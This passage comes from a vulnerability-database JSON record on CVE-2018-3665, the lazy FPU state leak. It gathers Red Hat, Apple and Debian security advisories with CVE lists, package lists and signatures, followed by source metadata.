mm/mempolicy.c:do_get_mempolicy\nfunction allows local denial of service or other unspecified impact\n(CVE-2018-10675)\n\n* Kernel: FPU state information leakage via lazy FPU restore\n(CVE-2018-3665)\n\n* kernel: error in exception handling leads to DoS (CVE-2018-8897\nregression) (CVE-2018-10872)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting CVE-2018-3639 and\nJulian Stecklina (Amazon.de), Thomas Prescher (cyberus-technology.de), and\nZdenek Sojka (sysgo.com) for reporting CVE-2018-3665. \n\nBug Fix(es):\n\n* Previously, microcode updates on 32 and 64-bit AMD and Intel\narchitectures were not synchronized. As a consequence, it was not possible\nto apply the microcode updates. This fix adds the synchronization to the\nmicrocode updates so that processors of the stated architectures receive\nupdates at the same time. As a result, microcode updates are now\nsynchronized. (BZ#1574592)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1566890 - CVE-2018-3639 hw: cpu: speculative store bypass\n1575065 - CVE-2018-10675 kernel: Use-after-free vulnerability in mm/mempolicy.c:do_get_mempolicy function allows local denial-of-service or other unspecified impact\n1585011 - CVE-2018-3665 Kernel: FPU state information leakage via lazy FPU restore\n1596094 - CVE-2018-10872 kernel: error in exception handling leads to DoS (CVE-2018-8897 regression)\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nkernel-2.6.32-754.2.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm\nkernel-devel-2.6.32-754.2.1.el6.i686.rpm\nkernel-headers-2.6.32-754.2.1.el6.i686.rpm\nperf-2.6.32-754.2.1.el6.i686.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.2.1.el6.noarch.rpm\nkernel-doc-2.6.32-754.2.1.el6.noarch.rpm\nkernel-firmware-2.6.32-754.2.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-devel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-headers-2.6.32-754.2.1.el6.x86_64.rpm\nperf-2.6.32-754.2.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\npython-perf-2.6.32-754.2.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nkernel-2.6.32-754.2.1.el6.src.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.2.1.el6.noarch.rpm\nkernel-doc-2.6.32-754.2.1.el6.noarch.rpm\nkernel-firmware-2.6.32-754.2.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-devel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-headers-2.6.32-754.2.1.el6.x86_64.rpm\nperf-2.6.32-754.2.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nkernel-2.6.32-754.2.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm\nkernel-devel-2.6.32-754.2.1.el6.i686.rpm\nkernel-headers-2.6.32-754.2.1.el6.i686.rpm\nperf-2.6.32-754.2.1.el6.i686.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.2.1.el6.noarch.rpm\nkernel-doc-2.6.32-754.2.1.el6.noarch.rpm\nkernel-firmware-2.6.32-754.2.1.el6.noarch.rpm\n\nppc64:\nkernel-2.6.32-754.2.1.el6.ppc64.rpm\nkernel-bootwrapper-2.6.32-754.2.1.el6.ppc64.rpm\nkernel-debug-2.6.32-754.2.1.el6.ppc64.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-754.2.1.el6.ppc64.rpm\nkernel-devel-2.6.32-754.2.1.el6.ppc64.rpm\nkernel-headers-2.6.32-754.2.1.el6.ppc64.rpm\nperf-2.6.32-754.2.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm\n\ns390x:\nkernel-2.6.32-754.2.1.el6.s390x.rpm\nkernel-debug-2.6.32-754.2.1.el6.s390x.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.s390x.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-754.2.1.el6.s390x.rpm\nkernel-devel-2.6.32-754.2.1.el6.s390x.rpm\nkernel-headers-2.6.32-754.2.1.el6.s390x.rpm\nkernel-kdump-2.6.32-754.2.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-754.2.1.el6.s390x.rpm\nkernel-kdump-devel-2.6.32-754.2.1.el6.s390x.rpm\nperf-2.6.32-754.2.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.s390x.rpm\n\nx86_64:\nkernel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-devel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-headers-2.6.32-754.2.1.el6.x86_64.rpm\nperf-2.6.32-754.2.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\npython-perf-2.6.32-754.2.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\n\nppc64:\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm\nkernel-debuginfo-common-ppc64-2.6.32-754.2.1.el6.ppc64.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm\npython-perf-2.6.32-754.2.1.el6.ppc64.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.s390x.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.s390x.rpm\nkernel-debuginfo-common-s390x-2.6.32-754.2.1.el6.s390x.rpm\nkernel-kdump-debuginfo-2.6.32-754.2.1.el6.s390x.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.s390x.rpm\npython-perf-2.6.32-754.2.1.el6.s390x.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-754.2.1.el6.src.rpm\n\ni386:\nkernel-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm\nkernel-devel-2.6.32-754.2.1.el6.i686.rpm\nkernel-headers-2.6.32-754.2.1.el6.i686.rpm\nperf-2.6.32-754.2.1.el6.i686.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-754.2.1.el6.noarch.rpm\nkernel-doc-2.6.32-754.2.1.el6.noarch.rpm\nkernel-firmware-2.6.32-754.2.1.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.i686.rpm\nkernel-debug-devel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-devel-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-headers-2.6.32-754.2.1.el6.x86_64.rpm\nperf-2.6.32-754.2.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-754.2.1.el6.i686.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\npython-perf-2.6.32-754.2.1.el6.i686.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-754.2.1.el6.x86_64.rpm\nperf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-2.6.32-754.2.1.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-754.2.1.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-3639\nhttps://access.redhat.com/security/cve/CVE-2018-3665\nhttps://access.redhat.com/security/cve/CVE-2018-10675\nhttps://access.redhat.com/security/cve/CVE-2018-10872\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBW0TykdzjgjWX9erEAQj7nQ/8DBiN11jNNGxND1Io2xuiZ+/RqzFz4IXv\nVMTrhukotRz5vbQWziRcHl0DVUttBBbwzdoNUu4RH4rxHv0J0GTLYusgyWlyDJP8\nD229CT7o6lK4RjPryXFsu/4YsIzu8Vz35KB8SpW6gUkXibANrCWDEHEqc9+6mQ6g\nVFe0wAu1Tw3PKre0zK+XL/uxkvjk8ZeDINe8WVUDloBOnxFMnZZjEcZsIO9JfjBr\nkrlU1QTQcPeKsrv6gofNXBOeQn0JZS1BVDy0JiNoOihJqPPBLA5RkyZzWouy6FDt\nxVTN7BEuILTUszfcygXA17OdNUzJm/L6a4rFXno4+eN5u5Ucx46/abXhWhRzcwvV\n+7IuGNs83aTZufXNbWDtiGFkIyKE5NyX7U7SOoxz42AxesSxJ6SKJFD4iBu/0YrU\nh9BvuHkkVNu+NsYT6rajqwz5ytkEbCJAX7xvNnu7Wi18tWKEWklqAFYSqVnpopO2\n8xSW2+OTSkAQ9uiGAz9aTLLca2Zi/I8kjAcNyv4tASUcvodNzUE/OuERC5hvOZ6X\n6j/POh7W7xA3cAg216EEj4X12BIwArqt8hjZ6hO5cd7ZfnWof7BVEjLnqtyJjhzi\nXap6Pf/NG4/iSO1kEFLo3Uw9sQVoPRU4Hg1KXJJy+XboBQ3/K9ctCU5qvTRApmmM\nOjBeir/Q654=I9wq\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2018-7-23-1 Additional information for APPLE-SA-2018-7-9-4\nmacOS High Sierra 10.13.6, Security Update 2018-004 Sierra,\nSecurity Update 2018-004 El Capitan\n\nmacOS High Sierra 10.13.6, Security Update 2018-004 Sierra, and\nSecurity Update 2018-004 El Capitan address the following:\n\nAMD\nAvailable for: macOS High Sierra 10.13.5\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An information disclosure issue was addressed by\nremoving the vulnerable code. \nCVE-2018-4289: shrek_wzw of Qihoo 360 Nirvan Team\n\nAPFS\nAvailable for: macOS High Sierra 10.13.5\nImpact: An application may be able to execute arbitrary code with\nkernel privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2018-4268: Mac working with Trend Micro\u0027s Zero Day Initiative\n\nATS\nAvailable for: macOS High Sierra 10.13.5\nImpact: A malicious application may be able to gain root privileges\nDescription: A type confusion issue was addressed with improved\nmemory handling. \nCVE-2018-4285: Mohamed Ghannam (@_simo36)\n\nBluetooth\nAvailable for: MacBook Pro (15-inch, 2018), and MacBook Pro\n(13-inch, 2018, Four Thunderbolt 3 Ports)\nOther Mac models were addressed with macOS High Sierra 10.13.5. \nImpact: An attacker in a privileged network position may be able to\nintercept Bluetooth traffic\nDescription: An input validation issue existed in Bluetooth. This\nissue was addressed with improved input validation. \nCVE-2018-5383: Lior Neumann and Eli Biham\nEntry added July 23, 2018\n\nCFNetwork\nAvailable for: macOS High Sierra 10.13.5\nImpact: Cookies may unexpectedly persist in Safari\nDescription: A cookie management issue was addressed with improved\nchecks. \nCVE-2018-4293: an anonymous researcher\n\nCoreCrypto\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6\nImpact: A malicious application may be able to break out of its\nsandbox\nDescription: A memory corruption issue was addressed with improved\ninput validation. \nCVE-2018-4269: Abraham Masri (@cheesecakeufo)\n\nDesktopServices\nAvailable for: macOS Sierra 10.12.6\nImpact: A local user may be able to view sensitive user information\nDescription: A permissions issue existed in which execute permission\nwas incorrectly granted. This issue was addressed with improved\npermission validation. \nCVE-2018-4178: Arjen Hendrikse\n\nIOGraphics\nAvailable for: macOS High Sierra 10.13.5\nImpact: A local user may be able to read kernel memory\nDescription: An out-of-bounds read issue existed that led to the\ndisclosure of kernel memory. This was addressed with improved input\nvalidation. \n\nAn information disclosure issue was addressed with FP/SIMD register\nstate sanitization. \nCVE-2018-3665: Julian Stecklina of Amazon Germany, Thomas Prescher of\nCyberus Technology GmbH (cyberus-technology.de), Zdenek Sojka of\nSYSGO AG (sysgo.com), and Colin Percival\n\nlibxpc\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS\nHigh Sierra 10.13.5\nImpact: An application may be able to gain elevated privileges\nDescription: A memory corruption issue was addressed with improved\nmemory handling. \nCVE-2018-4280: Brandon Azad\n\nlibxpc\nAvailable for: macOS High Sierra 10.13.5\nImpact: A malicious application may be able to read restricted memory\nDescription: An out-of-bounds read was addressed with improved input\nvalidation. \nCVE-2018-4248: Brandon Azad\n\nLinkPresentation\nAvailable for: macOS High Sierra 10.13.5\nImpact: Visiting a malicious website may lead to address bar spoofing\nDescription: A spoofing issue existed in the handling of URLs. This\nissue was addressed with improved input validation. \nCVE-2018-4277: xisigr of Tencent\u0027s Xuanwu Lab (tencent.com)\n\nAdditional recognition\n\nHelp Viewer\nWe would like to acknowledge Wojciech ReguAa (@_r3ggi) of SecuRing\nfor their assistance. \n\nHelp Viewer\nWe would like to acknowledge Wojciech ReguAa (@_r3ggi) of SecuRing\nfor their assistance. \n\nHelp Viewer\nWe would like to acknowledge Wojciech ReguAa (@_r3ggi) of SecuRing\nfor their assistance. \n\nHelp Viewer\nWe would like to acknowledge Wojciech ReguAa (@_r3ggi) of SecuRing\nfor their assistance. \n\nKernel\nWe would like to acknowledge juwei lin (@panicaII) of Trend Micro\nworking with Trend Micro\u0027s Zero Day Initiative for their\nassistance. \n\nSecurity\nWe would like to acknowledge Brad Dahlsten of Iowa State University\nfor their assistance. \n\nInstallation note:\n\nmacOS High Sierra 10.13.6, Security Update 2018-004 Sierra, and\nSecurity Update 2018-004 El Capitan may be obtained from the\nMac App Store or Apple\u0027s Software Downloads web site:\nhttps://support.apple.com/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: https://support.apple.com/kb/HT201222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCAAdFiEEfcwwPWJ3e0Ig26mf8ecVjteJiCYFAltUscgACgkQ8ecVjteJ\niCYeUhAApT+4xU8iuXThUb/3bH207ZNLf8NC6eCtaPLP55Dn27hdNZYoQfGZYmY5\njKsGNXAiel02GWQLpsTeNZaWM+Tzeuus41iSFrvBFtoS4SobMYw9ymV1emxBSlY6\nZDV3L47IJOMHeF9HwE260BgIMFJDF9jMGkm22VhLE3U7uQOdIjHgOAmr/reoof4Z\n84yNvBVK5/7DYlY4QxHL6bvsQG47FNs2P0WzpkrtLQwPXyz6y7I3VH4wc7G3J5dE\n9YanAw/f9d31GH5lrIJLJt+pFtOsqOonHfzgf+mn7THNBIXsr7HHTiycw+6rRBlj\nm9X2jL3VF25WNyU1Ir13z1Vt//Yksva8JluBFCUAMxFWi9FJhgF64Rscdmuj756u\nItMETXK15GSxc8X6Stoge3iMVfajS6nozVX99Pxf1I0XCBQNVNynQLkTL/ZzwJ7X\nmiBAMXywxgzZmSDo4LSs3Xs3dRk7eIPTQ7iY08wX2c5uJYfXs1deFIRaJPxsA0X3\nBH2SAL1kpesU0Qk1YZGnPLtja8c4jzvWKx31EI2v0uASiwBMdswu4FL78/dq19AB\nsqeW4xjmvCK2Yp9IEBp1oo0oTlfBrrl6dbnrwVFC0yBaJBAdCzlsO/oEm0VP5AKO\nCqPNW3N1JAQIg0hplXq+2gLMXA7SNzxRLh0rTDRQ19mow47fDmk=\n=Fo0i\n-----END PGP SIGNATURE-----\n. 7) - noarch, x86_64\n\n3. \n\nSecurity Fix(es):\n\n* A flaw was found in the implementation of the \"fill buffer\", a mechanism\nused by modern CPUs when a cache-miss is made on L1 CPU cache. If an\nattacker can generate a load operation that would create a page fault, the\nexecution will continue speculatively with incorrect data from the fill\nbuffer while the data is fetched from higher level caches. This response\ntime can be measured to infer data in the fill buffer. (CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level micro-optimizations\nto improve the performance of writing data back to CPU caches. The write\noperation is split into STA (STore Address) and STD (STore Data)\nsub-operations. These sub-operations allow the processor to hand-off\naddress generation logic into these sub-operations for optimized writes. \nBoth of these sub-operations write to a shared distributed processor\nstructure called the \u0027processor store buffer\u0027. (CVE-2018-12126)\n\n* Microprocessors use a \u2018load port\u2019 subcomponent to perform load operations\nfrom memory or IO. During a load operation, the load port receives data\nfrom the memory or IO subsystem and then provides the data to the CPU\nregisters and operations in the CPU\u2019s pipelines. Stale load operations\nresults are stored in the \u0027load port\u0027 table until overwritten by newer\noperations. Certain load-port operations triggered by an attacker can be\nused to reveal data about previous stale requests leaking data back to the\nattacker via a timing side-channel. \n\nBug Fix(es):\n\n* rwsem in inconsistent state leading system to hung (BZ#1690321)\n\n* efi_bgrt_init fails to ioremap error during boot (BZ#1692284)\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1391490 - CVE-2016-8633 kernel: Buffer overflow in firewire driver via crafted incoming packets\n1402885 - CVE-2016-7913 kernel: media: use-after-free in [tuner-xc2028] media driver\n1474928 - CVE-2017-11600 kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message\n1495089 - CVE-2017-12190 kernel: memory leak when merging buffers in SCSI IO vectors\n1517220 - CVE-2017-16939 Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation\n1520328 - CVE-2017-1000407 Kernel: KVM: DoS via write flood to I/O port 0x80\n1525474 - CVE-2017-17558 kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow\n1535173 - CVE-2017-13215 kernel: crypto: privilege escalation in skcipher_recvmsg function\n1552048 - CVE-2018-1068 kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c\n1585011 - CVE-2018-3665 Kernel: FPU state information leakage via lazy FPU restore\n1641878 - CVE-2018-18559 kernel: Use-after-free due to race condition in AF_PACKET implementation\n1646781 - CVE-2018-12126 hardware: Microarchitectural Store Buffer Data Sampling (MSBDS)\n1646784 - CVE-2018-12130 hardware: Microarchitectural Fill Buffer Data Sampling (MFBDS)\n1667782 - CVE-2018-12127 hardware: Micro-architectural Load Port Data Sampling - Information Leak (MLPDS)\n1705312 - CVE-2019-11091 hardware: Microarchitectural Data Sampling Uncacheable Memory (MDSUM)\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4232-1                   security@debian.org\nhttps://www.debian.org/security/                       Moritz Muehlenhoff\nJune 20, 2018                         https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : xen\nCVE ID         : CVE-2018-3665\n\nThis update provides mitigations for the \"lazy FPU\" vulnerability\naffecting a range of Intel CPUs, which could result in leaking CPU\nregister states belonging to another vCPU previously scheduled on the\nsame CPU. For additional information please refer to\nhttps://xenbits.xen.org/xsa/advisory-267.html\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.8.3+xsa267+shim4.10.1+xsa267-1+deb9u8. \n\nWe recommend that you upgrade your xen packages",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-3665"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005795"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-13392"
      },
      {
        "db": "BID",
        "id": "104460"
      },
      {
        "db": "VULHUB",
        "id": "VHN-133696"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-3665"
      },
      {
        "db": "PACKETSTORM",
        "id": "152897"
      },
      {
        "db": "PACKETSTORM",
        "id": "148468"
      },
      {
        "db": "PACKETSTORM",
        "id": "148486"
      },
      {
        "db": "PACKETSTORM",
        "id": "148641"
      },
      {
        "db": "PACKETSTORM",
        "id": "148246"
      },
      {
        "db": "PACKETSTORM",
        "id": "152883"
      },
      {
        "db": "PACKETSTORM",
        "id": "148257"
      }
    ],
    "trust": 3.24
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-133696",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-133696"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-3665",
        "trust": 4.2
      },
      {
        "db": "BID",
        "id": "104460",
        "trust": 2.7
      },
      {
        "db": "SECTRACK",
        "id": "1041124",
        "trust": 2.4
      },
      {
        "db": "SECTRACK",
        "id": "1041125",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-005795",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201806-895",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "152897",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-13392",
        "trust": 0.6
      },
      {
